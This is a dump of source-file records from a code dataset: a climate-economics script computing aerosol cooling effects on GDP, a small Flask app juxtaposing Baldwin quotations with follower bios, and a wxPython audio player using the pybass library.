"tests/test_transcendental.py", "file_name": "test_transcendental.py", "file_ext": "py", "file_size_in_byte": 1894, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "delta.util.create_cgra", "line_number": 13, "usage_type": "call"}, {"api_name": "archipelago.pnr", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 9, "usage_type": "attribute"}, {"api_name": "lassen.asm.add", "line_number": 29, "usage_type": "call"}, {"api_name": "lassen.asm", "line_number": 29, "usage_type": "name"}, {"api_name": "karst.core.MemoryInstruction", "line_number": 37, "usage_type": "call"}, {"api_name": "karst.core.MemoryMode.SRAM", "line_number": 37, "usage_type": "attribute"}, {"api_name": "karst.core.MemoryMode", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "118999857", "text": "# -*- coding: utf-8 -*-\n\n'''\nThis code calculates impacts of temperature changes induced by aerosols on GDP\n\npositive results mean benefits from aerosol-induced cooling\n\ndamage function developed in Burke, Matthew Davis, and Diffenbaugh (2018) \n\nassume results of each year is independent for the CESM repeating cycle simulations\n\ncalculate for each grid\n\nclimatological temeprature obtained from the ERA-Interim reanalysis dataset\n\nby Yixuan Zheng (yxzheng@carnegiescience.edu)\n''' \n \n\nimport pandas as pd\nimport numpy as np\nimport _env\nimport datetime\nimport xarray as xr\n\nnens = _env.nens\n\nyear = _env.year\nsyr = str(year)\ngdp_year = year\nsgdp_year = str(gdp_year)\n\npar = 'TREFHT' \nds = 'ERA-Interim'\n\nrean_ttag = '2001-2018'\n\nif_base = _env.idir_root+ '/reanalysis/ERA-Interim_Surface_Temp_' + rean_ttag + '_Regridded.nc'\nif_sim = _env.odir_root + '/sim_temperature/Simulated_Global_Gridded_' + par + '.nc'\n\nif_boot_par = _env.idir_root + 'Burke2018_Replication/data/output/bootstrap.csv'\nif_pop = _env.idir_root + '/pop/GPW_POP_25x19deg_2000.nc'\n\n\nodir_gdp = _env.odir_root + '/gdp_' + ds + '/'\n_env.mkdirs(odir_gdp)\n\nscenarios = ['With-Aerosol','No-Aerosol'] \n#read gridded temperature\n\n##base temperature from reanalysis data (ERA-Interim)\ni_base = xr.open_dataset(if_base)\ni_base = i_base.expand_dims({'ensembles':8})\n\ni_base.transpose('ensembles', 'lat', 'lon')\nT_grid_base = i_base['t2m_mean'] - 273.15 #K to C\n\n\ni_sim = xr.open_dataset(if_sim)\n\nT_grid_wa = i_sim[par + '_' +scenarios[0] + '_ensemble'] #With-Aerosol\nT_grid_na = i_sim[par + '_' +scenarios[1] + '_ensemble'] #No-Aerosol\n\nT_grid_na = T_grid_base - T_grid_wa + T_grid_na\nT_grid_wa = T_grid_base.copy()\n\n#bootstrap methods\nitbl_boots_par = pd.read_csv(if_boot_par,index_col=0)\nboot_methods = (pd.unique(itbl_boots_par['spec'])).tolist() #['country-lag0','country-lag1','country-lag5','year','year-blocks']\n\n#columns of output gdp ratio tables\n\n#dict stores all output tables\notbls_boot = {}\nomtrxs_ratio = {}\nomtrxs_gdp = {}\n\nfor b_m in boot_methods: #loop of bootstarpping methods \n \n mtbl_boot_par_b1 = xr.DataArray(itbl_boots_par.loc[itbl_boots_par['spec'] == b_m,'b1'],\n dims=('boots')\n )\n \n mtbl_boot_par_b2 = xr.DataArray(itbl_boots_par.loc[itbl_boots_par['spec'] == b_m,'b2'],\n dims=('boots')\n )\n \n o_dgr = xr.DataArray(np.zeros([len(mtbl_boot_par_b1),i_sim.ensembles.size,i_sim.lat.size,i_sim.lon.size]),\n dims=('boots', 'ensembles','lat','lon'),\n coords={'lat': i_sim.lat,\n 'lon': i_sim.lon})\n \n o_dgr = (T_grid_na*mtbl_boot_par_b1 + T_grid_na**2*mtbl_boot_par_b2) - (T_grid_wa*mtbl_boot_par_b1 + T_grid_wa**2*mtbl_boot_par_b2)\n \n o_dgr_m = o_dgr.median(dim=['boots','ensembles'])\n \n o_dgr.attrs['desc'] = 'Median of impacts of aerosol-induced cooling on annual GDP growth rate'\n \n ods = xr.Dataset({'GDP_Ratio_Median': o_dgr_m})\n \n ods.attrs['by'] = 'Yixuan Zheng (yxzheng@carnegiescience.edu)'\n ods.attrs['desc'] = 'Impacts of aerosol-induced cooling on GDP growth rate (based on damage functions developed by Burke et al. 2018)'\n ods.attrs['creattime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n \n ods.to_netcdf(odir_gdp + 'GDP_Changes_Burke_' + b_m + '_' + sgdp_year +'_' + ds + '_' + scenarios[1] + '_gridded.nc')\n", "sub_path": "modules/5.Cal_gdp_benefit_grid_Burke.py", "file_name": "5.Cal_gdp_benefit_grid_Burke.py", "file_ext": "py", "file_size_in_byte": 3487, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "_env.nens", "line_number": 26, "usage_type": "attribute"}, {"api_name": "_env.year", "line_number": 28, "usage_type": "attribute"}, {"api_name": "_env.idir_root", "line_number": 38, "usage_type": "attribute"}, {"api_name": "_env.odir_root", "line_number": 39, "usage_type": "attribute"}, {"api_name": "_env.idir_root", "line_number": 41, "usage_type": "attribute"}, {"api_name": "_env.idir_root", "line_number": 42, "usage_type": "attribute"}, {"api_name": "_env.odir_root", "line_number": 45, "usage_type": "attribute"}, {"api_name": "_env.mkdirs", "line_number": 46, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 52, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.unique", "line_number": 69, "usage_type": "call"}, {"api_name": "xarray.DataArray", "line_number": 80, "usage_type": "call"}, {"api_name": "xarray.DataArray", "line_number": 84, "usage_type": "call"}, {"api_name": "xarray.DataArray", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 88, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 103, "usage_type": "attribute"}]} +{"seq_id": "349404497", "text": "from flask import Flask, render_template\nimport random\nimport pickle\nimport io\n\nbaldwin = io.open('letter-from-a-region-baldwin.txt', encoding='utf-8').read()\nspencer_bios = pickle.load(open('bios.pickle', 'rb'))\n\napp = Flask(__name__)\n\n@app.route('/white')\ndef white():\n white_lines = []\n lines = baldwin.split('.')\n for line in lines:\n if line.lower().find('white'.lower()) != -1:\n white_lines.append(line)\n\n white_bios = []\n for bio in spencer_bios:\n if bio == '':\n spencer_bios.remove(bio)\n if bio == ' ':\n spencer_bios.remove(bio)\n words = bio.split()\n for word in words:\n if word.lower().find('white'.lower()) != -1:\n white_bios.append(bio)\n\n picker1 = random.randrange(0, len(white_bios), 1)\n picker2 = random.randrange(0, len(white_lines), 1)\n return render_template(\"whiteness.html\", rs_follower=white_bios[picker1], baldwin=white_lines[picker2])\n\nif __name__ == '__main__':\n app.run()\n", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 947, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "io.open", "line_number": 6, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 30, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "57121283", "text": "# Copyright Max Kolosov 2009-2013 pyirrlicht@gmail.com\n# http://pybass.sf.net\n# BSD license\n\n\nimport pybass\nimport sys\n\n\ntry:\n import pybassmidi\nexcept Exception:\n pybassmidi = None\n\n\ntry:\n from exe import wx\nexcept Exception:\n import wx\n\n\nfrom wx.lib.ticker import Ticker\n\n\ndef print_error():\n exc, err, traceback = sys.exc_info()\n print('%s %s ERROR ON LINE %d %s\\n' % (exc, traceback.tb_frame.f_code.co_filename, traceback.tb_lineno, err))\n del exc, err, traceback\n\n\nclass memory_stream:\n\n def __init__(self, data, name='memory_stream'):\n self.name = name\n self.current_position = 0\n self.data = data\n self.end_position = len(self.data) - 1\n self.decode_length = 0\n self.seconds = 0\n\n def read(self, size=1024):\n result = ''\n if self.current_position is not self.end_position and size > 0:\n last_index = self.current_position + size\n if last_index > self.end_position:\n last_index = self.end_position\n result = self.data[self.current_position: last_index]\n self.current_position = last_index\n return result\n\n def write(self, value=''):\n self.data += value\n\n def seek(self, position, whence=0):\n if whence is 0:\n if position <= self.end_position:\n self.current_position = position\n elif whence is 1:\n if position + self.current_position <= self.end_position:\n self.current_position += position\n elif whence is 2:\n if position < 0:\n position *= -1\n if self.end_position - position > 0:\n self.current_position = self.end_position - position\n\n def tell(self):\n return self.current_position\n\n def isatty(self):\n return 1\n\n def flush(self):\n pass\n\n def is_eof(self):\n return self.current_position == self.end_position\n\n\nclass slider_ctrl(wx.Slider):\n\n def __init__(self, *args, **kwargs):\n self.timer_interval = 500\n self.player_ctrl = args[0]\n wx.Slider.__init__(self, *args, **kwargs)\n self.timer = wx.Timer(self)\n self.Bind(wx.EVT_LEFT_DOWN, self.event_left_down)\n self.Bind(wx.EVT_LEFT_UP, self.event_left_up)\n self.Bind(wx.EVT_TIMER, self.event_timer)\n\n def __del__(self):\n if hasattr(self, 'timer'):\n self.timer.Stop()\n\n def timer_start(self):\n if not self.timer.IsRunning():\n self.timer.Start(self.timer_interval)\n\n def timer_stop(self):\n if self.timer.IsRunning():\n self.timer.Stop()\n\n def event_timer(self, event):\n if self.player_ctrl.method_get_position() < self.player_ctrl.method_get_length() - 1:\n self.SetValue(self.player_ctrl.method_get_position())\n else:\n self.player_ctrl.method_stop_audio()\n\n def event_left_down(self, event):\n self.timer_stop()\n event.Skip()\n\n def event_left_up(self, event):\n self.player_ctrl.method_set_position(self.GetValue())\n self.timer_start()\n event.Skip()\n\n\nclass player_ctrl(wx.Panel):\n\n def __init__(self, *args, **kwargs):\n\n self.stream = kwargs.pop('stream', None)\n self.name_stream = kwargs.pop('name_stream', 'memory_stream')\n self.bass_handle = 0\n self.sound_font = 0\n\n result = pybass.BASS_Init(-1, 44100, 0, 0, 0)\n if not result:\n bass_error_code = pybass.BASS_ErrorGetCode()\n if bass_error_code != pybass.BASS_ERROR_ALREADY:\n self.slider.Enable(False)\n self.btn_play.Enable(False)\n self.btn_stop.Enable(False)\n print('BASS_Init error %s' % pybass.get_error_description(bass_error_code))\n self.plugins = {}\n self.plugins['aac'] = (pybass.BASS_PluginLoad('bass_aac.dll', 0), '|AAC|*.aac')\n self.plugins['ac3'] = (pybass.BASS_PluginLoad('bass_ac3.dll', 0), '|AC3|*.ac3')\n self.plugins['aix'] = (pybass.BASS_PluginLoad('bass_aix.dll', 0), '|AIX|*.aix')\n self.plugins['ape'] = (pybass.BASS_PluginLoad('bass_ape.dll', 0), '|APE|*.ape')\n self.plugins['mpc'] = (pybass.BASS_PluginLoad('bass_mpc.dll', 0), '|MPC|*.mpc')\n self.plugins['ofr'] = (pybass.BASS_PluginLoad('bass_ofr.dll', 0), '|OFR|*.ofr')\n self.plugins['spx'] = (pybass.BASS_PluginLoad('bass_spx.dll', 0), '|SPX|*.spx')\n self.plugins['tta'] = (pybass.BASS_PluginLoad('bass_tta.dll', 0), '|TTA|*.tta')\n self.plugins['cda'] = (pybass.BASS_PluginLoad('basscd.dll', 0), '|CDA|*.cda')\n self.plugins['flac'] = (pybass.BASS_PluginLoad('bassflac.dll', 0), '|FLAC|*.flac')\n self.plugins['wma'] = (pybass.BASS_PluginLoad('basswma.dll', 0), '|WMA, WMV|*.wma;*.wmv')\n if pybassmidi:\n sound_font_file_name = 'CT4MGM.SF2'\n self.sound_font = pybassmidi.BASS_MIDI_FontInit(sound_font_file_name, 0)\n if self.sound_font == 0:\n print('BASS_MIDI_FontInit error %s (sound font file must be %s)' %\n (pybass.get_error_description(pybass.BASS_ErrorGetCode()), sound_font_file_name))\n else:\n self.plugins['midi'] = (pybass.BASS_PluginLoad('bassmidi.dll', 0), '|MID|*.mid')\n else:\n print('pybassmidi module not accessible')\n\n wx.Panel.__init__(self, *args, **kwargs)\n\n sizer_h = wx.BoxSizer(wx.HORIZONTAL)\n\n self.btn_play = wx.Button(self, wx.ID_ANY, _('Play'), style=wx.NO_BORDER)\n self.btn_play.SetToolTip(_('Play media data'))\n self.Bind(wx.EVT_BUTTON, self.event_play, self.btn_play)\n sizer_h.Add(self.btn_play)\n\n self.btn_stop = wx.Button(self, wx.ID_ANY, _('Stop'), style=wx.NO_BORDER)\n self.Bind(wx.EVT_BUTTON, self.event_stop, self.btn_stop)\n sizer_h.Add(self.btn_stop)\n\n self.btn_open = wx.Button(self, wx.ID_OPEN, _('Open'), style=wx.NO_BORDER)\n self.Bind(wx.EVT_BUTTON, self.event_open, self.btn_open)\n sizer_h.Add(self.btn_open)\n\n sizer_v = wx.BoxSizer(wx.VERTICAL)\n\n self.status_line = Ticker(self, fgcolor='#000062', bgcolor='#7F7F8F',\n start=False, ppf=1, fps=50, direction='ltr')\n sizer_v.Add(self.status_line, 0, wx.EXPAND)\n\n self.slider = slider_ctrl(self, wx.ID_ANY, 0, 0, 1)\n sizer_v.Add(self.slider, 0, wx.EXPAND)\n\n sizer_v.Add(sizer_h)\n\n self.SetSizer(sizer_v)\n self.SetAutoLayout(True)\n\n self.volume_slider = wx.Slider(self, wx.ID_ANY, pybass.BASS_GetVolume() * 100, 0, 100)\n self.Bind(wx.EVT_SCROLL, self.event_volume_slider, self.volume_slider)\n sizer_h.Add(self.volume_slider, 0, wx.EXPAND)\n\n self.method_check_controls()\n\n def method_load_file(self):\n import os\n wildcard = 'music sounds (MO3, IT, XM, S3M, MTM, MOD, UMX)|*.mo3;*.it;*.xm;*.s3m;*.mtm;*.mod;*.umx'\n wildcard += '|stream sounds (MP3, MP2, MP1, OGG, WAV, AIFF)|*.mp3;*.mp2;*.mp1;*.ogg;*.wav;*.aiff'\n for plugin in self.plugins.itervalues():\n if plugin[0] > 0:\n wildcard += plugin[1]\n wildcard += '|All files (*.*)|*.*'\n dlg = wx.FileDialog(self, message=_('Choose a file'), defaultDir=os.getcwd(),\n defaultFile='', wildcard=wildcard, style=wx.FD_OPEN | wx.FD_CHANGE_DIR)\n if dlg.ShowModal() == wx.ID_OK:\n self.name_stream = file_name = dlg.GetPath()\n if os.path.isfile(file_name):\n flags = 0\n if isinstance(file_name, unicode):\n flags |= pybass.BASS_UNICODE\n try:\n pybass.BASS_CHANNELINFO._fields_.remove(('filename', pybass.ctypes.c_char_p))\n except Exception:\n pass\n else:\n pybass.BASS_CHANNELINFO._fields_.append(('filename', pybass.ctypes.c_wchar_p))\n error_msg = 'BASS_StreamCreateFile error %s'\n new_bass_handle = 0\n if dlg.GetFilterIndex() == 0: # BASS_CTYPE_MUSIC_MOD\n flags |= pybass.BASS_MUSIC_PRESCAN\n new_bass_handle = pybass.BASS_MusicLoad(False, file_name, 0, 0, flags, 0)\n error_msg = 'BASS_MusicLoad error %s'\n else: # other sound types\n new_bass_handle = pybass.BASS_StreamCreateFile(False, file_name, 0, 0, flags)\n if new_bass_handle == 0:\n print(error_msg % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.method_stop_audio()\n self.bass_handle = new_bass_handle\n self.stream = None\n self.method_slider_set_range()\n self.method_check_controls()\n\n def method_load_wav_file(self):\n import os\n wildcard = 'wav (*.wav)|*.wav|All files (*.*)|*.*'\n dlg = wx.FileDialog(self, message=_('Choose a file'), defaultDir=os.getcwd(),\n defaultFile='', wildcard=wildcard, style=wx.OPEN | wx.CHANGE_DIR)\n if dlg.ShowModal() == wx.ID_OK:\n self.name_stream = file_name = dlg.GetPath()\n if os.path.isfile(file_name):\n flags = 0\n if isinstance(file_name, unicode):\n flags |= pybass.BASS_UNICODE\n try:\n pybass.BASS_CHANNELINFO._fields_.remove(('filename', pybass.ctypes.c_char_p))\n except Exception:\n pass\n else:\n pybass.BASS_CHANNELINFO._fields_.append(('filename', pybass.ctypes.c_wchar_p))\n\n def stream_callback(handle, buffer, length, user):\n b = pybass.ctypes.cast(buffer, pybass.ctypes.c_char_p)\n pybass.ctypes.memset(b, 0, length)\n data = pybass.ctypes.c_char_p(self.stream.read(length))\n pybass.ctypes.memmove(b, data, length)\n if self.stream.is_eof():\n length |= pybass.BASS_STREAMPROC_END\n self.stream.current_position = 0\n return length\n self.stream_callback = stream_callback\n self.user_func = pybass.STREAMPROC(self.stream_callback)\n self.stream = memory_stream(open(file_name, 'rb').read(), file_name)\n new_bass_handle = pybass.BASS_StreamCreate(44100, 2, flags, self.user_func, 0)\n if new_bass_handle == 0:\n print('BASS_StreamCreate error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.method_stop_audio()\n self.bass_handle = new_bass_handle\n self.stream = None\n self.method_slider_set_range()\n self.method_check_controls()\n\n def method_load_data(self, stream, name_stream='memory_stream'):\n if stream is not None:\n if isinstance(stream, (str, list, tuple, buffer)):\n self.stream = memory_stream(stream, name_stream)\n else:\n self.stream = stream\n if isinstance(self.stream, memory_stream):\n system = pybass.STREAMFILE_BUFFER\n flags = 0\n\n def callback_close(user):\n self.stream.current_position = 0\n self.callback_close = callback_close\n\n def callback_length(user):\n return len(self.stream.data)\n self.callback_length = callback_length\n\n def callback_read(buffer, length, user):\n b = pybass.ctypes.cast(buffer, pybass.ctypes.c_char_p)\n pybass.ctypes.memset(b, 0, length)\n data = pybass.ctypes.c_char_p(self.stream.read(length))\n pybass.ctypes.memmove(b, data, length)\n return length\n self.callback_read = callback_read\n\n def callback_seek(offset, user):\n self.stream.seek(offset)\n return True\n self.callback_seek = callback_seek\n self.bass_file_procs = pybass.BASS_FILEPROCS()\n self.bass_file_procs.close = pybass.FILECLOSEPROC(self.callback_close)\n self.bass_file_procs.length = pybass.FILELENPROC(self.callback_length)\n self.bass_file_procs.read = pybass.FILEREADPROC(self.callback_read)\n self.bass_file_procs.seek = pybass.FILESEEKPROC(self.callback_seek)\n new_bass_handle = pybass.BASS_StreamCreateFileUser(\n system, flags, self.bass_file_procs, id(self.stream.data))\n if new_bass_handle == 0:\n print('BASS_StreamCreateFileUser error %s' %\n pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.method_stop_audio()\n self.bass_handle = new_bass_handle\n channel_info = self.method_get_channel_info()\n if channel_info.ctype == pybass.BASS_CTYPE_STREAM_OGG:\n import pyogginfo\n ogg_info = pyogginfo.VorbisStreamInfo()\n stream = pyogginfo.SimpleDemultiplexer(ogg_info)\n if isinstance(self.stream.data, str):\n stream.process(self.stream.data)\n else:\n stream.process(str(self.stream.data))\n self.stream.decode_length = ogg_info.lastPosition\n self.stream.seconds = ogg_info.stop\n try:\n for key, value in ogg_info.comments.comments:\n if key == 'TITLE':\n if value.strip() > '':\n self.stream.name = value\n except Exception:\n pass\n self.method_slider_set_range()\n self.method_check_controls()\n\n def method_get_channel_info(self):\n channel_info = pybass.BASS_CHANNELINFO()\n if not pybass.BASS_ChannelGetInfo(self.bass_handle, channel_info):\n print('BASS_ChannelGetInfo error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n return channel_info\n\n def method_get_state(self):\n return pybass.BASS_ChannelIsActive(self.bass_handle)\n\n def method_get_length(self):\n result = pybass.BASS_ChannelGetLength(self.bass_handle, pybass.BASS_POS_BYTE)\n if result <= 0 and isinstance(self.stream, memory_stream):\n result = self.stream.decode_length\n return result\n\n def method_get_position(self):\n return pybass.BASS_ChannelGetPosition(self.bass_handle, pybass.BASS_POS_BYTE)\n\n def method_set_position(self, value):\n if not pybass.BASS_ChannelSetPosition(self.bass_handle, value, pybass.BASS_POS_BYTE):\n print('BASS_ChannelSetPosition error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n\n def method_slider_set_range(self):\n self.slider.SetRange(0, self.method_get_length())\n\n def method_check_controls(self):\n if self.bass_handle:\n self.slider.Enable(True)\n self.btn_play.Enable(True)\n if self.method_get_state() == pybass.BASS_ACTIVE_STOPPED:\n self.btn_stop.Enable(False)\n else:\n self.btn_stop.Enable(True)\n\n if hasattr(self.stream, 'name'):\n text = self.stream.name + ' (' + pybass.seconds_to_string(self.stream.seconds) + ')'\n else:\n # ~ channel_info = self.method_get_channel_info()\n # ~ text = channel_info.filename\n text = self.name_stream + ' (' + pybass.stream_length_as_hms(self.bass_handle) + ')'\n self.status_line.SetText(text)\n if self.status_line.GetText() != '':\n self.status_line.Start()\n else:\n self.slider.Enable(False)\n self.btn_play.Enable(False)\n self.btn_stop.Enable(False)\n if self.status_line.GetText() == '':\n if self.status_line.IsTicking():\n self.status_line.Stop()\n\n def method_is_end(self):\n return self.method_get_state() == pybass.BASS_ACTIVE_STOPPED and self.method_get_position() == 0\n\n def method_play(self):\n if self.bass_handle:\n if self.method_get_state() in (pybass.BASS_ACTIVE_STOPPED, pybass.BASS_ACTIVE_PAUSED):\n if not pybass.BASS_ChannelPlay(self.bass_handle, False):\n print('BASS_ChannelPlay error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.slider.timer_start()\n self.btn_play.SetLabel(_('Pause'))\n self.btn_stop.Enable(True)\n else:\n if not pybass.BASS_ChannelPause(self.bass_handle):\n print('BASS_ChannelPause error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.slider.timer_stop()\n self.btn_play.SetLabel(_('Unpause'))\n\n def event_volume_slider(self, event):\n pybass.BASS_SetVolume(event.GetPosition() / 100.0)\n\n def event_play(self, event):\n self.method_play()\n\n def event_open(self, event):\n self.method_load_file()\n\n def event_stop(self, event):\n self.method_stop_audio()\n\n def method_stop_audio(self):\n self.method_stop_audio_stream()\n self.btn_play.SetLabel(_('Play'))\n self.slider.SetValue(0)\n self.btn_stop.Enable(False)\n\n def method_stop_audio_stream(self):\n self.slider.timer_stop()\n if self.bass_handle:\n if not pybass.BASS_ChannelStop(self.bass_handle):\n print('BASS_ChannelStop error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.method_set_position(0)\n\n def method_free_handle(self):\n if self.bass_handle:\n channel_info = self.method_get_channel_info()\n if channel_info.ctype >= pybass.BASS_CTYPE_MUSIC_MOD:\n if not pybass.BASS_MusicFree(self.bass_handle):\n print('BASS_MusicFree error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.bass_handle = 0\n elif channel_info.ctype >= pybass.BASS_CTYPE_STREAM:\n if not pybass.BASS_StreamFree(self.bass_handle):\n print('BASS_StreamFree error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n else:\n self.bass_handle = 0\n\n def method_reset(self):\n self.method_free_handle()\n self.status_line.SetText('')\n self.method_check_controls()\n\n def __del__(self):\n self.method_free_handle()\n if self.sound_font != 0 and pybassmidi:\n if pybassmidi.BASS_MIDI_FontFree(self.sound_font):\n print('BASS_MIDI_FontFree error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n for plugin in self.plugins.itervalues():\n if plugin[0] > 0:\n if pybass.BASS_PluginFree(plugin[0]):\n print('BASS_PluginFree error %s' % pybass.get_error_description(pybass.BASS_ErrorGetCode()))\n\n\nif __name__ == '__main__':\n import os\n import gettext\n from locale import getdefaultlocale, setlocale, LC_ALL\n from wx.lib.agw.aui import AuiManager\n from wx.lib.agw.aui import AuiPaneInfo\n # from wx.lib.agw.aui import AuiToolBar\n # from wx.lib.agw.aui import AUI_TB_DEFAULT_STYLE\n # from wx.lib.agw.aui import AUI_TB_OVERFLOW\n from wx.html import HtmlHelpController\n setlocale(LC_ALL, '')\n\n class log_ctrl(wx.TextCtrl):\n\n def __init__(self, *args, **kwargs):\n self.file_name = kwargs.pop('file_name', 'log.txt')\n self.main_frame = kwargs.pop('main_frame', None)\n self.add_to_file = kwargs.pop('add_to_file', False)\n if self.main_frame is None:\n self.main_frame = args[0]\n super(log_ctrl, self).__init__(*args, **kwargs)\n\n def __write__(self, content):\n self.WriteText(content)\n\n def show_control(self, ctrl_name='log_ctrl'):\n if self.main_frame is not None:\n if hasattr(self.main_frame, 'aui_manager'):\n self.main_frame.show_aui_pane_info(ctrl_name)\n self.SetInsertionPointEnd()\n if self.add_to_file:\n self.flush()\n\n def write(self, content):\n self.show_control()\n self.__write__(content)\n\n def writelines(self, l):\n self.show_control()\n map(self.__write__, l)\n\n def flush(self):\n self.SaveFile(self.file_name)\n\n class main_frame(wx.Frame):\n\n def __init__(self, *args, **kwargs):\n self.app = kwargs.pop('app', None)\n wx.Frame.__init__(self, *args, **kwargs)\n # =============== Logging Text Control ================\n self.log_ctrl = log_ctrl(self, style=wx.TE_MULTILINE, add_to_file=True)\n sys.stdout = self.log_ctrl\n sys.stderr = self.log_ctrl\n self.log = wx.LogTextCtrl(self.log_ctrl)\n self.log.SetLogLevel(wx.LOG_Error)\n # ~ wx.Log_SetActiveTarget(self.log)\n # =============== player Control ================\n self.player = player_ctrl(self)\n # =============== StatusBar ================\n statusbar = self.CreateStatusBar(2)\n statusbar.SetStatusWidths([-1, -1])\n statusbar.SetStatusText(_('Welcome into application!'), 0)\n # =============== AuiManager ================\n self.aui_manager = AuiManager()\n self.aui_manager.SetManagedWindow(self)\n self.aui_manager.AddPane(self.player, AuiPaneInfo().Name('player').CenterPane())\n self.aui_manager.AddPane(self.log_ctrl, AuiPaneInfo().Name(\n 'log_ctrl').Bottom().Layer(0).BestSize((100, 100)).Hide())\n if self.log_ctrl.GetValue() != '':\n self.aui_manager.GetPane('log_ctrl').Show()\n self.aui_manager.Update()\n\n def DoUpdate(self):\n self.aui_manager.Update()\n\n def show_aui_pane_info(self, name):\n if not self.aui_manager.GetPane(name).IsShown():\n self.aui_manager.GetPane(name).Show()\n self.aui_manager.Update()\n\n def show_hide_aui_pane_info(self, name):\n if self.aui_manager.GetPane(name).IsShown():\n self.aui_manager.GetPane(name).Hide()\n else:\n self.aui_manager.GetPane(name).Show()\n self.aui_manager.Update()\n\n # ~ class application(wx.PySimpleApp):\n class application(wx.App):\n app_version = '0.4'\n app_path = os.getcwd()\n app_name = os.path.basename(sys.argv[0].split('.')[0])\n help_file = app_path + '/' + app_name + '.htb'\n settings_name = app_path + '/' + app_name + '.cfg'\n\n def start(self):\n result = True\n self.help_file = self.app_name + '.htb'\n # SETUP LANGUAGE\n lang_catalog = getdefaultlocale()[0]\n list_trans = []\n current_trans = -1\n i = 0\n if os.path.exists('lang/%s' % lang_catalog):\n for dir_name in os.listdir('lang'):\n if os.path.exists('lang/%s/%s.mo' % (dir_name, self.app_name)):\n if dir_name == lang_catalog:\n current_trans = i\n self.help_file = 'lang/' + dir_name + '/' + self.help_file\n list_trans.append(gettext.GNUTranslations(\n open('lang/%s/%s.mo' % (dir_name, self.app_name), 'rb')))\n i += 1\n if len(list_trans) > 0:\n try:\n list_trans[current_trans].install(unicode=True) # wx.USE_UNICODE\n except Exception:\n print_error()\n if current_trans == -1:\n trans = gettext.NullTranslations()\n trans.install(unicode=True) # wx.USE_UNICODE\n # SETUP WX LANGUAGE TRANSLATION TO OS DEFAULT LANGUAGE\n # WX DIRECTORY MUST BE TO CONTAIN LANG DIRECTORY\n self.locale = wx.Locale(wx.LANGUAGE_DEFAULT)\n # CHECK EXISTS INSTANCE\n name_user = wx.GetUserId()\n name_instance = self.app_name + '::'\n self.instance_checker = wx.SingleInstanceChecker(name_instance + name_user)\n if self.instance_checker.IsAnotherRunning():\n wx.MessageBox(_('Software is already running.'), _('Warning'))\n return False\n # CREATE HTML HELP CONTROLLER\n # ~ wx.FileSystem.AddHandler(wx.ZipFSHandler())\n self.help_controller = HtmlHelpController()\n if os.path.exists(self.help_file):\n self.help_controller.AddBook(self.help_file)\n # ABOUT APPLICATION\n self.developers = [_('Maxim Kolosov')]\n self.copyright = _('(C) 2013 Max Kolosov')\n self.web_site = ('http://pybass.sf.net', _('Home page'))\n self.email = ('mailto:pyirrlicht@gmail.com', _('email for feedback'))\n self.license = _('BSD license')\n self.about_description = _('wxPython bass music player.')\n # CREATE MAIN FRAME\n self.main_frame = main_frame(None, wx.ID_ANY, self.app_name, app=self)\n self.SetTopWindow(self.main_frame)\n self.main_frame.Show()\n return result\n\n def OnExit(self):\n try:\n del self.instance_checker\n except Exception:\n print_error()\n\n app = application(0)\n if app.start():\n app.MainLoop()\n else:\n app.OnExit()\n", "sub_path": "source/pybass/wx_ctrl_phoenix.py", "file_name": "wx_ctrl_phoenix.py", "file_ext": "py", "file_size_in_byte": 26415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.exc_info", "line_number": 26, "usage_type": "call"}, {"api_name": "wx.Slider", "line_number": 80, "usage_type": "attribute"}, {"api_name": "wx.Slider.__init__", "line_number": 85, "usage_type": "call"}, {"api_name": "wx.Slider", "line_number": 85, "usage_type": "attribute"}, {"api_name": "wx.Timer", "line_number": 86, "usage_type": "call"}, {"api_name": "wx.EVT_LEFT_DOWN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "wx.EVT_LEFT_UP", "line_number": 88, "usage_type": "attribute"}, {"api_name": "wx.EVT_TIMER", "line_number": 89, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pybass.BASS_Init", "line_number": 128, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 130, "usage_type": "call"}, {"api_name": "pybass.BASS_ERROR_ALREADY", "line_number": 131, "usage_type": "attribute"}, {"api_name": "pybass.get_error_description", "line_number": 135, 